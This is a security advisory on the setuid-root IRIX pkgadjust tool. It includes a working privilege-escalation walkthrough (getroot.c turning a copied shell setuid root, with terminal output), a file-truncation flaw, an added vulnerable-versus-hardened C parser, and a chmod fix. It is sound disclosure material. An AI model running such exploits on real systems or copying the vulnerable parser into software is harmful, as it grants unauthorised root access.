COMMAND

    /usr/pkg/bin/pkgadjust

SYSTEMS AFFECTED

    SGI IRIX 5.3. IRIX 5.2 is not affected; unsure about IRIX 6.

PROBLEM

    PROBLEM 1.  pkgadjust is installed setuid root and lets any user
    choose, on the command line, where its debugging output is written:

         -o    write debugging output to <file> rather than to stderr

    pkgadjust does not check who owns the named file, or whether the
    invoking user could write to it, before opening it as root, so any
    file on the system can be truncated and overwritten with debugging
    output.  Destroying a file a service depends on is a denial of
    service; destroying a file the system consults before granting
    access removes that authorization check.

    PROBLEM 2. pkgadjust will allow any user to gain superuser access.
    The program it runs to list installed packages can be replaced from
    the command line:

                  -a <cmd> normally 'versions long' command line
                  -b <cmd> normally 'versions -v' command line

    Whatever is named here is executed by the setuid-root process, so an
    unprivileged user can have an arbitrary program of their own run as
    root.

    This is trivially exploited. Copy a shell into the current directory,
    then name a small program as the package lister; pkgadjust runs it as
    root while it works through the inst database:

    % cat > getroot.c
    #include <unistd.h>
    #include <sys/stat.h>
    /* runs as root from inside pkgadjust: make ./sh a setuid-root shell */
    int main(void) { setuid(0); chown("sh", 0, 0); chmod("sh", 04755); return 0; }
    % cc getroot.c -o getroot
    % cp /bin/sh sh
    % ls -la sh
    -rwxr-xr-x    1 hhui     user      140784 Jan  5 20:52 sh
    % /usr/pkg/bin/pkgadjust -f -a getroot
    scanning inst-database

    updating pkginfo-files
    ........................................^C
    % ls -la sh
    -rwsr-xr-x    1 root     sys       140784 Jan  5 20:52 sh

    Once the copied shell is owned by root and setuid, the run can be
    interrupted and ./sh started for a root shell.
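    The two defects above, and one way a setuid tool can avoid them, as an
    added C example. This is not code from the advisory, from SGI or from
    pkgadjust itself; the structure, the function names, the option
    parsing and the assumed `/usr/sbin/versions` path are this example's
    own. The vulnerable parser honours -a and -o unconditionally; the
    hardened one refuses a caller-chosen program whenever the process
    carries privileges its invoker lacks, and opens the -o file with the
    invoker's real uid and gid so root's authority is never lent to the
    file write.

```c
#define _XOPEN_SOURCE 700     /* seteuid/setegid, O_NOFOLLOW */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed fixed path of the package lister; the real one is not given. */
#define DEFAULT_LISTER "/usr/sbin/versions"

struct pkgadjust_opts {
    const char *out_path;   /* -o <file>: debugging output, NULL = stderr */
    const char *lister;     /* -a <cmd>:  program that lists packages */
    int force;              /* -f */
};

/* Is the process carrying privileges its invoker does not have? */
int running_setuid(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/*
 * The pattern the advisory describes: every option is honoured no matter
 * who invoked the program.  Running as root, "-a getroot" executes getroot
 * as root and "-o /etc/passwd" truncates /etc/passwd.
 */
int parse_opts_vulnerable(int argc, char **argv, struct pkgadjust_opts *o)
{
    int i;
    *o = (struct pkgadjust_opts){ NULL, DEFAULT_LISTER, 0 };
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-f") == 0)
            o->force = 1;
        else if (strcmp(argv[i], "-o") == 0 && i + 1 < argc)
            o->out_path = argv[++i];
        else if (strcmp(argv[i], "-a") == 0 && i + 1 < argc)
            o->lister = argv[++i];
        else
            return -1;
    }
    return 0;
}

/*
 * Hardened: when invoked with privileges the caller lacks, refuse any option
 * that names a program to execute.  -o is still accepted because the file
 * is opened later with the caller's own identity (open_debug_output).
 * 'privileged' is a parameter rather than a call to running_setuid() so the
 * policy can be exercised from an ordinary, non-setuid binary.
 */
int parse_opts_hardened(int argc, char **argv, int privileged,
                        struct pkgadjust_opts *o)
{
    int i;
    *o = (struct pkgadjust_opts){ NULL, DEFAULT_LISTER, 0 };
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-f") == 0)
            o->force = 1;
        else if (strcmp(argv[i], "-o") == 0 && i + 1 < argc)
            o->out_path = argv[++i];
        else if (strcmp(argv[i], "-a") == 0 && i + 1 < argc) {
            if (privileged)
                return -1;      /* never run caller-chosen code as root */
            o->lister = argv[++i];
        } else
            return -1;
    }
    return 0;
}

/*
 * Open the -o target as the invoker, not as root: temporarily set the
 * effective uid/gid to the real ones so the kernel's permission check is
 * made against the caller, and refuse to follow a symlink at the last path
 * component (O_NOFOLLOW is POSIX.1-2008; the IRIX of the advisory predates
 * it).  Returns the fd, or -1 with errno set.
 */
int open_debug_output(const char *path)
{
    uid_t saved_uid = geteuid();
    gid_t saved_gid = getegid();
    int fd, err;

    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return -1;
    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0644);
    err = errno;
    seteuid(saved_uid);     /* regain root first; setegid needs it */
    setegid(saved_gid);
    errno = err;
    return fd;
}

int main(int argc, char **argv)
{
    struct pkgadjust_opts o;
    if (parse_opts_hardened(argc, argv, running_setuid(), &o) != 0) {
        fprintf(stderr, "usage: %s [-f] [-o file] [-a cmd]\n", argv[0]);
        return 2;
    }
    if (o.out_path != NULL) {
        int fd = open_debug_output(o.out_path);
        if (fd < 0) { perror(o.out_path); return 1; }
        close(fd);
    }
    printf("would list packages with %s%s\n", o.lister, o.force ? " (-f)" : "");
    return 0;
}
```

    Built and run as an ordinary binary, `./a.out -o /tmp/dbg -a /bin/true`
    is accepted because no privilege is involved; installed setuid root,
    the same `-a` is rejected and `-o /etc/passwd` fails with EACCES for a
    non-root caller instead of truncating the file.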

SOLUTION

    # chmod 700 /usr/pkg/bin/pkgadjust

    This clears the setuid bit and leaves the program runnable by root
    only, which closes both problems above.

    DISCUSSION. No sermons  here, but I  really doubt the  program was
    written for setuid. Since most  users can't write to the  lockfile
    in /var/sadm,  many pkg*  commands are  unavailable. I  also found
    these files improperly  permissioned and would  recommend removing
    setuid:

    -rwsr-xr-x    1 root     sys          838 Sep 27 11:27 /usr/lib/X11/app-defaults/ISDN
    -rws--x--x    1 root     sys        18632 Sep 27 10:59 /usr/pkg/bin/abspath